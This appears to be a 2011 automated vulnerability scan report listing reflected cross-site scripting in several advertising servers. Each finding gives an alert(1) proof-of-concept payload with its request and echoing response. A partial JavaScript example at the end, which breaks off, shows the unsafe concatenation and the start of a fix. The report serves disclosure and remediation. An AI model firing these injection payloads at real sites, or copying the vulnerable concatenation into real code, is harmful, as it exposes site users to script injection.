GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9b5009"-alert(1)-"6877c3dfa7c&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8381
Date: Mon, 16 May 2011 01:32:01 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
optimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9b5009"-alert(1)-"6877c3dfa7c&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_0000001184");
var
...[SNIP]...

5.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c09c"-alert(1)-"29bf5f9ba6d was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=3631121c09c"-alert(1)-"29bf5f9ba6d&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8381
Date: Mon, 16 May 2011 01:31:10 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ttp%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=3631121c09c"-alert(1)-"29bf5f9ba6d&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_000000
...[SNIP]...

5.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [pubICode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edd95"-alert(1)-"46635aeff4 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912edd95"-alert(1)-"46635aeff4&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8377
Date: Mon, 16 May 2011 01:30:15 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
oQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912edd95"-alert(1)-"46635aeff4&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneo
...[SNIP]...

5.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5396963.28 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5396963.28

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46709"-alert(1)-"ff673e56b43 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3941.InviteMedia/B5396963.28;sz=728x90;pc=[TPAS_ID];click=http://ads.bluelithium.com/clk?2,13%3B8d02082879581ff7%3B12ff663a67a,0%3B%3B%3B2397112293,CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAeqZj9i8BAAAAAAAAAGE2MjQzODgyLTdmNWEtMTFlMC04YTVhLTc3NDdlNGUwYmMzYwCXoQEAAAA=,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,$http://t.invitemedia.com/track_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml46709"-alert(1)-"ff673e56b43&redirectURL=;ord=1305508816? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ALzkFwAILYsAAAAAAKtBIwAAAAAAAgAAAAYAAAAAAP8AAAABFWsaJQAAAAAA2FUaAAAAAABYNy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACImw8AAAAAAAIAAwAAAAAAAMAGSKWj0T-amZmZmZnpPwBwCJqODNY.AAAAAAAA8D8AcAiajgzWPwAAAAAAAPA.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADI6aWeTWAZCpUsQVInXGZ0vFMokz1-sdRznR8RAAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F4462%2F5032%2F7102-2.html,Z%3D728x90%26s%3D1565884%26_salt%3D3199842828%26B%3D10%26r%3D0,a6243882-7f5a-11e0-8a5a-7747e4e0bc3c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8381
Date: Mon, 16 May 2011 01:32:52 GMT
Cache-Control: private, x-gzip-ok=""

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
rack_click?auctionID=13055088161565884-111371&campID=88218&crID=111371&pubICode=1725912&pub=363112&partnerID=9&url=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F4462%2F5032%2F7102%2D2%2Ehtml46709"-alert(1)-"ff673e56b43&redirectURL=http%3a%2f%2fwww.twcbc.com/Texas/LeadGen/tsmoffer_acq.html%3Fmediaid%3Dneobc_d_0000001184");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

5.7. http://ad.turn.com/server/pixel.htm [fpid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53909"><script>alert(1)</script>6f86f34a5c9 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=53909"><script>alert(1)</script>6f86f34a5c9&sp=y HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:51 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:50 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=8396388994325352248&fpid=53909"><script>alert(1)</script>6f86f34a5c9&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.8. http://ad.turn.com/server/pixel.htm [sp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8be12"><script>alert(1)</script>a7cb27fcac5 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=1&sp=8be12"><script>alert(1)</script>a7cb27fcac5 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:52 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:19:52 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=2848499807473428303&fpid=1&nu=n&t=&sp=8be12"><script>alert(1)</script>a7cb27fcac5&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

5.9. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afbcc'-alert(1)-'de2db0c7e4f was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193afbcc'-alert(1)-'de2db0c7e4f&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:24:15 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:24:15 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:24:15 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193afbcc'-alert(1)-'de2db0c7e4f&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

5.10. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c41fd'-alert(1)-'405c5446774 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchc41fd'-alert(1)-'405c5446774 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:25:25 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:25:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 01:25:25 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/matchc41fd'-alert(1)-'405c5446774?admeld_adprovider_id=193&external_user_id=3420415245200633085&expiration=0" width="0" height="0"/>');

5.11. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db21a"-alert(1)-"6d8220e3728 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=ad&ad_size=728x90&section=1565884&db21a"-alert(1)-"6d8220e3728=1 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:23:40 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 01:23:40 GMT
Pragma: no-cache
Content-Length: 4323
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "ad"; rm_url = "http://ads.bluelithium.com/imp?Z=728x90&db21a"-alert(1)-"6d8220e3728=1&s=1565884&_salt=128442006";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(r
...[SNIP]...
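Added example, not code from adnxs.com or bluelithium.com: the 5.10 and 5.11 responses both drop a request value into a quoted JavaScript string literal (single-quoted inside document.write for 5.10, double-quoted rm_url for 5.11). The block below reproduces the 5.10 concatenation exactly as the response shows it, then a hardened version that validates admeld_callback as an http(s) URL on an allowed host and encodes it first for the HTML attribute and then for the JavaScript string it travels through. The allowed-host list, the numeric check on the user id and the shape of the handler are assumptions; the payload string is the one from the report.

```javascript
// Added example (not the adnxs.com usersync code). Reproduces the vulnerable
// concatenation seen in finding 5.10 and shows a hardened equivalent.

// Assumption: the only callback host this sync endpoint should redirect to.
const ALLOWED_CALLBACK_HOSTS = new Set(['tag.admeld.com']);

// Vulnerable pattern, byte-for-byte what the 5.10 response emits: the raw
// callback value is spliced into a single-quoted JS string that is itself
// HTML written by document.write().
function buildUsersyncUnsafe(callback, userId) {
  return "document.write('<img src=\"" + callback +
    '?admeld_adprovider_id=193&external_user_id=' + userId +
    '&expiration=0" width="0" height="0"/>\');';
}

// Encoding for a value placed inside a double-quoted HTML attribute.
function encodeHtmlAttr(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// JavaScript string literal. JSON.stringify escapes quotes, backslashes and
// control characters; the extra \u-escapes cover characters that matter when
// the script body is later inlined into HTML or ends a quoted literal.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/[<>&'\u2028\u2029]/g,
    c => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Hardened version: validate the callback as an absolute http(s) URL on an
// allowed host, build the query with the URL API, then encode for the HTML
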